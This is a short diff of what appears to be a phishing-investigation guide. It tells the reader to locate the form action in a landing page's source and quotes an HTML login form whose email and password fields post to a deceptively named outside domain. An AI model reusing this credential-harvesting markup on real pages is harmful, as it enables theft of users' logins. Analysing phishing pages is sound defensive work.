-- Locate the "form action" tag element in the source code of this initial landing page.
+- Locate the <form action> tag element in the source code of this initial landing page.
 This element represents the action that will occur when a user submits the data entry form of the landing page.

 <form action="https://https.protected-forms.com/pages/domain/XXXXXXXXXX" id="loginform" method="POST"><input id="uname" name="uname" placeholder="Email or phone" required="" type="text" /> <input id="password" name="password" placeholder="Password" required="" type="password" />

 <div class="checkWrap"><input id="remember" name="remember" type="checkbox" value="0" /> <label for="remember">Keep me signed in</label></div>